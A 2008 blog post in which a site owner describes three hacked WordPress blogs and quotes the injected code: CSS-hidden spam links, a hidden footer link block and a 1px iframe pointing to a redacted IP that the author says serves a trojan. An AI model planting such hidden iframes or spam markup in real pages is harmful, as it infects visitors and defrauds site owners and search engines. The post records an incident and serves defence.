My Wordpress Hacked with Hidden Spam Injection

Hits for this post:6386 |
Written by pramudita.anindita.ptd — published on May 12th, 2008 |

Three of my Wordpress blog hacked, that blogs installed on 2 different servers. I was hit by the spam injection. Spammer(s) injected long hidden links (hundreds of lines!) in blog posts and footer of my HYIP blog for revenue sharing site. Spammer(s) are also inserting iframes in blog posts of my other multi register users blog. That spammer(s) hacked this blog too with inject(s) hidden link of common spam words into footer only ( people can’t register at this blog).

Blogs are most likely attacked by some kind of automated tool since the amounts of spam are too big to work manually on all those spam pages creation.

Hidden Text Injection : The insertion was done deliberately to hide the text from display as follows (Injected into blog posts from one of my multi users blog):

<font style="overflow: hidden; position: absolute; height: 0pt; width: 0pt">
Spam words with link to spam websites
</font>

Iframe Injection : my other multi register users blog injected with a 1px iframe due to a vulnerability in WordPress … looks like this :

<!-- Traffic Statistics --> <iframe width="1" height="1" frameborder="0" src="http://xx.xxx.xx.xx/iframe/wp-stats.php"> </iframe><!-- End Traffic Statistics -->

and of course it downloads a trojan. Its happening to a TON of blogs too.

Template Injection : Not only did the hackers insert “invisible” code into my blog posts, what had happened was my template had been hacked so that the footer had included a ton of hidden spam terms.
Number of paragraphs: 1
Number of words: 115,520
Number of letters and digits: 468,439
Number of characters: 595,969
File size: 628,009 bytes

Look like this :

<!-- ~ --><u style="display: none"> <a href="http://spammerdomain.ext/spampage.html">ton of spam terms </a> </u><!-- ~ -->

from lower credit card to porn credit card, from buy cheap car insurance to unreal auto car insurance :p

Now, I’m trying to get more information and solve this problem and trying to find the answers for these questions :

Why would someone want to hack my website?
What should I do to detect and eventually block hacking attempts?
What kinds of hackery going on?
How to Prevent SQL Injection Attacks?
How To Repair The Damage?
Search Engine Effects of This Situation
Etc.
I’ll be back soon !

Update :

Google temporarily removed some of my webpages from their search results. Currently pages from blog.pramudita.com are scheduled to be removed for at least 30 days. This blog hacked too. Spam terms inserted into footer.php of current theme and user : “wordpress” registered into that blog, also he changed these files :

index.php
xmlrpc.php
wp-trackback.php and
wp-settings.php

This entry was posted on Monday, May 12th, 2008 at 5:08 pm and is filed under WordPress. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site. .

2 Responses to “My Wordpress Hacked with Hidden Spam Injection”

You can subscribe to the RSS feed for comments on this post. You can also reply to this post directly in your weblog, and take advantage of the TrackBack URI to record your reply in this post.

Forex trading software. says:
July 21st, 2008 at 4:23 am - - |

It’s a terrible thing to hear that. Did you manage to fix it? How did you fix it??
What precautions can one take that would be very effective against such hacks?

http://www.forexfreedownload.com
Pramudita Dropped From Google SERP | Pramudita's Network says:
August 18th, 2008 at 8:08 am - - |

[...] Blog). That blog not gets serious attention when my blogs hit by the spam injection. Yes….my blogs hacked with hidden spam injection. I have been tardy to repair that blog. So Google SE detected that : Dear site owner or webmaster [...]

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>